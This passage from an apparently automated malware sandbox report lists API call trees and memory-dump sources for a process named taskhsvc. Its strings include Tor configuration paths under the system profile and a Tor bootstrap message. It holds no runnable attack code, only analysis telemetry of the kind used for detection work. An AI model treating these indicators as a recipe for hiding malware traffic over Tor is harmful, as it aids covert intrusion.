      • Part of subcall function 00325CFA: __stack_chk_fail.LIBSSP-0 ref: 0032601B
      • Part of subcall function 003255C5: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00312E2F), ref: 00325635
      • Part of subcall function 003255C5: _write.MSVCRT ref: 00325691
      • Part of subcall function 003255C5: __stack_chk_fail.LIBSSP-0 ref: 003256C2
    • strerror.MSVCRT ref: 003266A8
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 003265AE: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,003266E8), ref: 003265E2
    • __stack_chk_fail.LIBSSP-0 ref: 00326762
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    • abort.MSVCRT ref: 00326730
      • Part of subcall function 00326573: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,002C0EBF), ref: 003265A7
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • __stack_chk_fail.LIBSSP-0 ref: 001D55E3
      • Part of subcall function 0021F792: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00206074), ref: 0021F7B2
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • abort.MSVCRT ref: 00319C9A
      • Part of subcall function 00321355: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00319CF8), ref: 003213C1
      • Part of subcall function 00321355: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00319CF8), ref: 003213E7
    • memset.MSVCRT ref: 00319D32
    • __stack_chk_fail.LIBSSP-0 ref: 00319D4C
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0021307F), ref: 00210DD3
    • __stack_chk_fail.LIBSSP-0 ref: 00210E2D
      • Part of subcall function 001DE526: abort.MSVCRT ref: 001DE588
      • Part of subcall function 001DE526: abort.MSVCRT ref: 001DE5C7
      • Part of subcall function 001DE526: abort.MSVCRT ref: 001DE60E
      • Part of subcall function 001DE526: abort.MSVCRT ref: 001DE655
      • Part of subcall function 001DE526: abort.MSVCRT ref: 001DE730
      • Part of subcall function 001DE526: __stack_chk_fail.LIBSSP-0 ref: 001DE7A0
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • abort.MSVCRT ref: 00231A78
      • Part of subcall function 003EC083: event_set_log_callback.LIBEVENT-2-0-5(?,?,?,?,?,?,?,?,?,00231A82), ref: 003EC09A
      • Part of subcall function 003EC083: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,00231A82), ref: 003EC0AB
      • Part of subcall function 003EC0B2: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,00231A8E), ref: 003EC0DC
    • memset.MSVCRT ref: 00231AA4
      • Part of subcall function 002319D3: __stack_chk_fail.LIBSSP-0 ref: 00231A21
      • Part of subcall function 003EC11F: abort.MSVCRT ref: 003EC173
      • Part of subcall function 003EC11F: event_config_new.LIBEVENT-2-0-5 ref: 003EC183
      • Part of subcall function 003EC11F: abort.MSVCRT ref: 003EC1C5
      • Part of subcall function 003EC11F: event_config_set_flag.LIBEVENT-2-0-5(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00231ACE), ref: 003EC1D8
      • Part of subcall function 003EC11F: event_config_set_num_cpus_hint.LIBEVENT-2-0-5(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00231ACE), ref: 003EC1F5
      • Part of subcall function 003EC11F: event_config_set_flag.LIBEVENT-2-0-5(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00231ACE), ref: 003EC208
      • Part of subcall function 003EC11F: event_base_new_with_config.LIBEVENT-2-0-5(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00231ACE), ref: 003EC213
      • Part of subcall function 003EC11F: event_config_free.LIBEVENT-2-0-5(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00231ACE), ref: 003EC223
      • Part of subcall function 003EC11F: exit.MSVCRT ref: 003EC25C
      • Part of subcall function 003EC11F: event_get_version.LIBEVENT-2-0-5(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00231ACE), ref: 003EC268
      • Part of subcall function 003EC11F: __stack_chk_fail.LIBSSP-0 ref: 003EC2A5
    • __stack_chk_fail.LIBSSP-0 ref: 00231AE6
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855104216.00230000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 0022990B: SHGetSpecialFolderLocation.SHELL32 ref: 00229964
      • Part of subcall function 0022990B: _getcwd.MSVCRT ref: 0022997C
      • Part of subcall function 0022990B: SHGetPathFromIDListA.SHELL32 ref: 002299D9
      • Part of subcall function 0022990B: __stack_chk_fail.LIBSSP-0 ref: 00229AA1
      • Part of subcall function 00316005: __stack_chk_fail.LIBSSP-0 ref: 0031605E
    • __stack_chk_fail.LIBSSP-0 ref: 00229B28
    Strings
    • z9C, xrefs: 00229AFC
    • C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\torrc-defaults, xrefs: 00229AE0, 00229AEC
    • C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\torrc, xrefs: 00229B0C, 00229B18
    Memory Dump Source
    • Source File: 00000013.00000002.1855077166.00228000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • getsockname.WS2_32 ref: 001F30A2
    • __stack_chk_fail.LIBSSP-0 ref: 001F33E6
      • Part of subcall function 0031910D: __stack_chk_fail.LIBSSP-0 ref: 00319194
      • Part of subcall function 0031919B: strerror.MSVCRT ref: 003191ED
      • Part of subcall function 0031919B: __stack_chk_fail.LIBSSP-0 ref: 003191FD
      • Part of subcall function 00319B0B: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,003145AC), ref: 00319B69
      • Part of subcall function 0032B94F: abort.MSVCRT ref: 0032B9AB
      • Part of subcall function 0032B94F: abort.MSVCRT ref: 0032B9EA
      • Part of subcall function 0032B94F: memset.MSVCRT ref: 0032BA05
      • Part of subcall function 0032B94F: __stack_chk_fail.LIBSSP-0 ref: 0032BAEA
      • Part of subcall function 001E8718: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001EF09F), ref: 001E873F
    • free.MSVCRT ref: 001F31CA
      • Part of subcall function 0032DA95: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,002564FC), ref: 0032DAE3
      • Part of subcall function 0032EC9C: abort.MSVCRT ref: 0032ED00
      • Part of subcall function 0032EC9C: memset.MSVCRT ref: 0032ED1B
      • Part of subcall function 0032EC9C: __stack_chk_fail.LIBSSP-0 ref: 0032EDD9
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 0032D7F2: abort.MSVCRT ref: 0032D854
      • Part of subcall function 0032D7F2: abort.MSVCRT ref: 0032D893
      • Part of subcall function 0032D7F2: memcpy.MSVCRT ref: 0032D8AD
      • Part of subcall function 0032D7F2: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,001F57C7), ref: 0032D8C0
    • free.MSVCRT ref: 001F335D
      • Part of subcall function 00319BE8: memset.MSVCRT ref: 00319C1F
      • Part of subcall function 00319BE8: __stack_chk_fail.LIBSSP-0 ref: 00319C3A
      • Part of subcall function 0032158B: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00313E8F), ref: 003215E4
      • Part of subcall function 0032158B: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00313E8F), ref: 00321623
      • Part of subcall function 0032158B: memcpy.MSVCRT ref: 0032164A
      • Part of subcall function 0032158B: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00313E8F), ref: 0032165D
      • Part of subcall function 00319D53: __stack_chk_fail.LIBSSP-0 ref: 00319DB3
      • Part of subcall function 00222CFD: __stack_chk_fail.LIBSSP-0 ref: 00222D23
      • Part of subcall function 00321144: memset.MSVCRT ref: 0032117D
      • Part of subcall function 00321144: __stack_chk_fail.LIBSSP-0 ref: 00321190
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 0021F792: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00206074), ref: 0021F7B2
      • Part of subcall function 001ECB60: __stack_chk_fail.LIBSSP-0 ref: 001ECEAA
      • Part of subcall function 001E8718: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001EF09F), ref: 001E873F
      • Part of subcall function 0032D3C2: abort.MSVCRT ref: 0032D412
      • Part of subcall function 0032D3C2: __stack_chk_fail.LIBSSP-0 ref: 0032D507
    • memset.MSVCRT ref: 001ECFFA
      • Part of subcall function 0032E04A: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0032E0EC), ref: 0032E0B0
      • Part of subcall function 0032D28C: abort.MSVCRT ref: 0032D2DC
      • Part of subcall function 0032D28C: __stack_chk_fail.LIBSSP-0 ref: 0032D3BB
    • memset.MSVCRT ref: 001ED09B
      • Part of subcall function 0032B7BA: memset.MSVCRT ref: 0032B7F8
      • Part of subcall function 0032B7BA: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001EEAEA), ref: 0032B8FC
    • abort.MSVCRT ref: 001ED11A
    • __stack_chk_fail.LIBSSP-0 ref: 001ED1BD
      • Part of subcall function 0021FF60: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,001C3667), ref: 0021FFA2
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
      • Part of subcall function 001EC647: abort.MSVCRT ref: 001EC6C4
      • Part of subcall function 001EC647: abort.MSVCRT ref: 001EC703
      • Part of subcall function 001EC647: abort.MSVCRT ref: 001EC742
      • Part of subcall function 001EC647: abort.MSVCRT ref: 001EC9EF
      • Part of subcall function 001EC647: connect.WS2_32 ref: 001ECA38
      • Part of subcall function 001EC647: __stack_chk_fail.LIBSSP-0 ref: 001ECB59
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • abort.MSVCRT ref: 001E459D
    • abort.MSVCRT ref: 001E45E0
    • abort.MSVCRT ref: 001E46E5
      • Part of subcall function 001E331A: __stack_chk_fail.LIBSSP-0 ref: 001E335F
      • Part of subcall function 001E4071: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E5072), ref: 001E4145
      • Part of subcall function 001E4071: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E5072), ref: 001E419E
      • Part of subcall function 001E4071: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E5072), ref: 001E41C6
      • Part of subcall function 001E4243: recv.WS2_32 ref: 001E42C1
      • Part of subcall function 001E4243: abort.MSVCRT ref: 001E4431
      • Part of subcall function 001E4243: __stack_chk_fail.LIBSSP-0 ref: 001E4444
    • __stack_chk_fail.LIBSSP-0 ref: 001E4715
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 0021F792: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00206074), ref: 0021F7B2
      • Part of subcall function 00231AED: abort.MSVCRT ref: 00231B56
      • Part of subcall function 00231AED: abort.MSVCRT ref: 00231B99
      • Part of subcall function 00231AED: abort.MSVCRT ref: 00231BE6
      • Part of subcall function 00231AED: strlen.MSVCRT ref: 00231BF4
      • Part of subcall function 00231AED: strlen.MSVCRT ref: 00231C08
      • Part of subcall function 00231AED: strlen.MSVCRT ref: 00231C26
      • Part of subcall function 00231AED: strlen.MSVCRT ref: 00231C44
      • Part of subcall function 00231AED: __stack_chk_fail.LIBSSP-0 ref: 00231D14
      • Part of subcall function 003259C5: abort.MSVCRT ref: 00325A21
      • Part of subcall function 003259C5: _stati64.MSVCRT ref: 00325A8E
      • Part of subcall function 003259C5: free.MSVCRT ref: 00325AA7
      • Part of subcall function 003259C5: strerror.MSVCRT ref: 00325AD7
      • Part of subcall function 003259C5: _mkdir.MSVCRT ref: 00325B54
      • Part of subcall function 003259C5: strerror.MSVCRT ref: 00325B72
      • Part of subcall function 003259C5: __stack_chk_fail.LIBSSP-0 ref: 00325C45
    • free.MSVCRT ref: 002CF754
      • Part of subcall function 0032587B: _stati64.MSVCRT ref: 00325913
      • Part of subcall function 0032587B: free.MSVCRT ref: 0032592C
      • Part of subcall function 0032587B: __stack_chk_fail.LIBSSP-0 ref: 003259BE
    • strerror.MSVCRT ref: 002CF7A9
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    • __stack_chk_fail.LIBSSP-0 ref: 002CF869
      • Part of subcall function 002D04A8: abort.MSVCRT ref: 002D0507
      • Part of subcall function 002D04A8: free.MSVCRT ref: 002D06A5
      • Part of subcall function 002D04A8: __stack_chk_fail.LIBSSP-0 ref: 002D06DA
    • free.MSVCRT ref: 002CF84F
    Memory Dump Source
    • Source File: 00000013.00000002.1855196147.00290000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,002E0704), ref: 003216BD
    • __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,002E0704), ref: 00321744
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    • abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,002E0704), ref: 003216FC
      • Part of subcall function 0032107E: abort.MSVCRT ref: 003210D1
      • Part of subcall function 0032107E: malloc.MSVCRT ref: 003210E9
      • Part of subcall function 0032107E: exit.MSVCRT ref: 0032112A
      • Part of subcall function 0032107E: __stack_chk_fail.LIBSSP-0 ref: 0032113D
    • memcpy.MSVCRT ref: 00321726
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00335D24), ref: 003214FA
    • __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00335D24), ref: 00321584
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    • abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00335D24), ref: 0032153C
      • Part of subcall function 0032107E: abort.MSVCRT ref: 003210D1
      • Part of subcall function 0032107E: malloc.MSVCRT ref: 003210E9
      • Part of subcall function 0032107E: exit.MSVCRT ref: 0032112A
      • Part of subcall function 0032107E: __stack_chk_fail.LIBSSP-0 ref: 0032113D
    • strncpy.MSVCRT ref: 00321566
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 0021F792: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00206074), ref: 0021F7B2
      • Part of subcall function 002B4037: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,0026B8B5), ref: 002B408C
      • Part of subcall function 002B4093: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,0026B89E), ref: 002B40C7
      • Part of subcall function 002B3B52: __stack_chk_fail.LIBSSP-0 ref: 002B3C6E
      • Part of subcall function 002B2F9B: __stack_chk_fail.LIBSSP-0 ref: 002B301C
      • Part of subcall function 002B3F06: abort.MSVCRT ref: 002B3F62
      • Part of subcall function 002B3F06: __stack_chk_fail.LIBSSP-0 ref: 002B3F72
      • Part of subcall function 002B6848: __stack_chk_fail.LIBSSP-0 ref: 002B68D1
      • Part of subcall function 002B0D2C: __stack_chk_fail.LIBSSP-0 ref: 002B0D7F
    • abort.MSVCRT ref: 002B32EC
      • Part of subcall function 002B0D86: __stack_chk_fail.LIBSSP-0 ref: 002B0E09
      • Part of subcall function 002B3023: abort.MSVCRT ref: 002B308D
      • Part of subcall function 002B3023: time.MSVCRT ref: 002B30F0
      • Part of subcall function 002B3023: __stack_chk_fail.LIBSSP-0 ref: 002B3141
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
      • Part of subcall function 002C1E90: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,00238007), ref: 002C1EC8
      • Part of subcall function 002B4177: __stack_chk_fail.LIBSSP-0 ref: 002B4248
      • Part of subcall function 002B354C: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002B3295), ref: 002B362A
    • __stack_chk_fail.LIBSSP-0 ref: 002B33E1
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855196147.00290000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 001DBA88: __stack_chk_fail.LIBSSP-0 ref: 001DBACF
      • Part of subcall function 00321144: memset.MSVCRT ref: 0032117D
      • Part of subcall function 00321144: __stack_chk_fail.LIBSSP-0 ref: 00321190
      • Part of subcall function 00319D53: __stack_chk_fail.LIBSSP-0 ref: 00319DB3
      • Part of subcall function 003014B0: abort.MSVCRT(?,?,?,?,?,?,001DC022), ref: 0030151B
      • Part of subcall function 003014B0: abort.MSVCRT(?,?,?,?,?,?,001DC022), ref: 0030155A
      • Part of subcall function 003014B0: abort.MSVCRT(?,?,?,?,?,?,001DC022), ref: 003015B8
      • Part of subcall function 003014B0: abort.MSVCRT(?,?,?,?,?,?,001DC022), ref: 003015FC
      • Part of subcall function 003014B0: __stack_chk_fail.LIBSSP-0 ref: 003016DF
      • Part of subcall function 0030102B: abort.MSVCRT ref: 0030108F
      • Part of subcall function 0030102B: abort.MSVCRT ref: 003010CE
      • Part of subcall function 0030102B: abort.MSVCRT ref: 00301122
      • Part of subcall function 0030102B: __stack_chk_fail.LIBSSP-0 ref: 00301237
    • __stack_chk_fail.LIBSSP-0 ref: 001DC0CE
      • Part of subcall function 001DB8B3: abort.MSVCRT ref: 001DB992
      • Part of subcall function 001DB8B3: __stack_chk_fail.LIBSSP-0 ref: 001DBA81
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 002BA2D6: __stack_chk_fail.LIBSSP-0 ref: 002BA3B6
      • Part of subcall function 00319B0B: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,003145AC), ref: 00319B69
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 002148AA: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,002149AA), ref: 002148FD
    • __stack_chk_fail.LIBSSP-0 ref: 00214B2B
      • Part of subcall function 001DCFB4: __stack_chk_fail.LIBSSP-0 ref: 001DCFE5
      • Part of subcall function 0027701D: time.MSVCRT ref: 0027703A
      • Part of subcall function 0027701D: abort.MSVCRT ref: 0027707C
      • Part of subcall function 0027701D: __stack_chk_fail.LIBSSP-0 ref: 00277096
      • Part of subcall function 001DEAC4: abort.MSVCRT ref: 001DEB1D
      • Part of subcall function 001DEAC4: abort.MSVCRT ref: 001DEB5C
      • Part of subcall function 001DEAC4: __stack_chk_fail.LIBSSP-0 ref: 001DF151
      • Part of subcall function 00211254: free.MSVCRT ref: 0021127E
      • Part of subcall function 00211254: __stack_chk_fail.LIBSSP-0 ref: 00211296
      • Part of subcall function 0020FEEE: __stack_chk_fail.LIBSSP-0 ref: 0020FF21
      • Part of subcall function 0021002B: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00214A74), ref: 0021006B
      • Part of subcall function 003040B6: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,0027CC2C,?,?,?,?,?,?,?,?,?,002C3756), ref: 003040D6
      • Part of subcall function 003064D9: __stack_chk_fail.LIBSSP-0 ref: 0030658E
      • Part of subcall function 001F1535: __stack_chk_fail.LIBSSP-0 ref: 001F157E
      • Part of subcall function 00210FB7: memcpy.MSVCRT ref: 00211052
      • Part of subcall function 00210FB7: __stack_chk_fail.LIBSSP-0 ref: 00211063
      • Part of subcall function 001DE7A7: abort.MSVCRT ref: 001DE800
      • Part of subcall function 001DE7A7: abort.MSVCRT ref: 001DE83F
      • Part of subcall function 001DE7A7: __stack_chk_fail.LIBSSP-0 ref: 001DEAB7
      • Part of subcall function 00342356: abort.MSVCRT ref: 003423A6
      • Part of subcall function 00342356: SSL_pending.SSLEAY32 ref: 003423B4
      • Part of subcall function 00342356: __stack_chk_fail.LIBSSP-0 ref: 003423C4
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 002088CD: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,00208E8D), ref: 00208AD3
      • Part of subcall function 00313207: __stack_chk_fail.LIBSSP-0 ref: 00313277
      • Part of subcall function 00316005: __stack_chk_fail.LIBSSP-0 ref: 0031605E
      • Part of subcall function 0020807A: __stack_chk_fail.LIBSSP-0 ref: 002080F9
    • __stack_chk_fail.LIBSSP-0 ref: 00208D09
    Strings
    • U, xrefs: 00208B32
    • NOTICE BOOTSTRAP PROGRESS=80 TAG=conn_or SUMMARY="Connecting to the Tor network", xrefs: 00208C64
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 003425CA: ERR_peek_error.LIBEAY32 ref: 003425E6
      • Part of subcall function 003425CA: __stack_chk_fail.LIBSSP-0 ref: 0034265D
    • abort.MSVCRT ref: 001E4857
      • Part of subcall function 001E331A: __stack_chk_fail.LIBSSP-0 ref: 001E335F
      • Part of subcall function 001E4071: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E5072), ref: 001E4145
      • Part of subcall function 001E4071: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E5072), ref: 001E419E
      • Part of subcall function 001E4071: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E5072), ref: 001E41C6
      • Part of subcall function 001E444E: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E4806), ref: 001E44BA
      • Part of subcall function 001E444E: __stack_chk_fail.LIBSSP-0 ref: 001E4520
    • __stack_chk_fail.LIBSSP-0 ref: 001E4887
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855588250.003F6000.00000080.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 002F116D: __stack_chk_fail.LIBSSP-0 ref: 002F11D4
    • abort.MSVCRT ref: 002F1B59
      • Part of subcall function 00321144: memset.MSVCRT ref: 0032117D
      • Part of subcall function 00321144: __stack_chk_fail.LIBSSP-0 ref: 00321190
      • Part of subcall function 0032158B: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00313E8F), ref: 003215E4
      • Part of subcall function 0032158B: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00313E8F), ref: 00321623
      • Part of subcall function 0032158B: memcpy.MSVCRT ref: 0032164A
      • Part of subcall function 0032158B: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00313E8F), ref: 0032165D
      • Part of subcall function 002F11DB: __stack_chk_fail.LIBSSP-0 ref: 002F128B
      • Part of subcall function 002F0D90: __stack_chk_fail.LIBSSP-0 ref: 002F0E87
    • __stack_chk_fail.LIBSSP-0 ref: 002F1B7C
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
